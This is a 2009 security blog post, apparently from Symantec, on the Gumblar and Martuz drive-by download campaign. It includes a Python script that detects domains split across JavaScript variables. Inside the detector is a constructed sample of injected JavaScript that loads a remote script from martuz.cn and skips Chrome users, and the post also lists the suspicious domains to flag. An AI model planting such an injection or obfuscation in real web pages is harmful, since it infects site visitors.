
Malware Whac-a-Mole: Gumblar is down, Martuz is up. Next?! 

May 19, 2009 07:04 AM

The malicious code Whac-a-Mole game continues. Just as security vendors start detecting the domains and malware associated with the drive-by download attacks coming from the malicious Gumblar domains, the bad guys are changing the game and popping up from Martuz dot cn, which, according to Who.is, is located in the UK with a 95.129.x.x IP Address. The JavaScript appearing on the websites has also become more obfuscated, making the attacks slightly harder for IT managers and Web administrators to detect. The attackers are easily able to change the obfuscation by substituting portions of the domain name with variables instead of spelling out the domain all at once. The updated malicious JavaScript also performs a test to deliver a different payload for users of Google Chrome browsers, since Chrome has a blacklist of suspicious and malicious domains.
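The two obfuscation tricks described above (assembling the domain from string variables so it never appears spelled out, and branching on the browser's user-agent) can both be surfaced with a small static check. The Python script below is an added example for this post, not code from Symantec or from the analysis it cites: it folds simple `var x = "..."` assignments and `+` concatenation chains back into literals, extracts any hosts that only become visible after folding, and notes whether the script tests `navigator.userAgent` for Chrome. The two JavaScript fragments are constructed for the demonstration (one in the style the post describes, one benign); the only domain names taken from the post are martuz.cn and gumblar.cn.

```python
import re

# Constructed sample in the style the post describes: the domain is split across
# variables and a user-agent test decides what gets injected. Not a real capture.
SAMPLE_SPLIT = '''
var a = "mar"; var b = "tuz"; var c = ".cn";
if (navigator.userAgent.indexOf("Chrome") == -1) {
  document.write('<script src="http://' + a + b + c + '/x.js"></scr' + 'ipt>');
}
'''

# Constructed benign sample: ordinary string concatenation, no remote host.
SAMPLE_CLEAN = '''
var greeting = "Hello"; var name = "world";
document.getElementById("out").innerText = greeting + ", " + name;
'''

# Domains named in the post; a real deployment would feed this from threat intel.
SUSPICIOUS_DOMAINS = {"martuz.cn", "gumblar.cn"}

# `var x = "literal";` or `x = 'literal';` (single statement, single line)
STRING_ASSIGN = re.compile(r'''(?:var\s+)?([A-Za-z_$][\w$]*)\s*=\s*(["'])(.*?)\2\s*;''')
# two or more terms (string literal or identifier) joined by `+`
CONCAT_CHAIN = re.compile(
    r'''((?:(?:"[^"]*"|'[^']*'|[A-Za-z_$][\w$]*)\s*\+\s*)+(?:"[^"]*"|'[^']*'|[A-Za-z_$][\w$]*))'''
)
TERM = re.compile(r'''"([^"]*)"|'([^']*)'|([A-Za-z_$][\w$]*)''')
HOST = re.compile(r'https?://([A-Za-z0-9.-]+)', re.IGNORECASE)


def collect_string_vars(js):
    """Map variable names to the string literal they are assigned."""
    return {name: value for name, _quote, value in STRING_ASSIGN.findall(js)}


def resolve_concatenations(js, string_vars):
    """Replace each `+` chain whose terms are all literals or known string
    variables with a single double-quoted literal; unresolved chains are kept."""
    def fold(match):
        parts = []
        for dq, sq, ident in TERM.findall(match.group(1)):
            if ident:
                if ident not in string_vars:
                    return match.group(0)  # unknown identifier: leave chain as is
                parts.append(string_vars[ident])
            else:
                parts.append(dq if dq else sq)
        return '"' + "".join(parts) + '"'
    return CONCAT_CHAIN.sub(fold, js)


def analyze(js, suspicious_domains=SUSPICIOUS_DOMAINS):
    """Return the hosts referenced by the script, the subset that only appears
    once concatenation is folded, any hosts on the watch list, and whether the
    script branches on a Chrome user-agent check."""
    resolved = resolve_concatenations(js, collect_string_vars(js))
    visible_hosts = {h.lower() for h in HOST.findall(js)}
    all_hosts = {h.lower() for h in HOST.findall(resolved)}
    return {
        "hosts": sorted(all_hosts),
        "assembled_hosts": sorted(all_hosts - visible_hosts),
        "flagged_hosts": sorted(h for h in all_hosts if h in suspicious_domains),
        "user_agent_branch": bool(re.search(r"navigator\.userAgent", js)) and "Chrome" in js,
    }


if __name__ == "__main__":
    for label, sample in (("split-domain sample", SAMPLE_SPLIT), ("benign sample", SAMPLE_CLEAN)):
        print(label, analyze(sample))
```

Folding only handles the static case the post describes (literals and plain variables joined with `+`); scripts that build strings from character codes or decode them at runtime need a real JavaScript interpreter or a sandbox. A host that appears only in `assembled_hosts` is worth a second look on its own, watch list or not, because legitimate pages rarely hide the address of a script they include.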


The drive-by download tries to exploit a number of underlying vulnerabilities, including some for Adobe Acrobat and Adobe Flash. Users should make sure that their systems are running the latest versions of these and other third-party applications to help mitigate the risk of being compromised.


So how is it that so many websites are compromised at one time? Often it is due to SQL injection vulnerabilities or direct hacking into the back end of the hosting companies, but it appears that this recent problem may be more about compromised FTP passwords belonging to the people who administer the websites. In any case, it means the bad guys are able to keep changing the malicious code until the admin changes the FTP passwords and blocks the trespassing. IT managers and Web administrators should work with their hosting companies to ensure websites are clean.


Symantec antivirus detects some of the malicious code and malware as Bloodhound.Exploit.196, Trojan.Pidief.C, or Bloodhound.PDF.7. We expect the domains and malicious JavaScript appearing on the websites to continually change as one mole is whacked, and another pops up. In the meantime, make sure you have the latest Norton products installed that include IPS and Symantec Browser Protection, Symantec Endpoint Protection with IPS, and the latest third-party application updates (including those for Adobe Acrobat and Adobe Flash).

Note: My thanks to Nishant Doshi for his analysis of this threat.

Message Edited by Trevor Mack on 05-19-2009 06:44 AM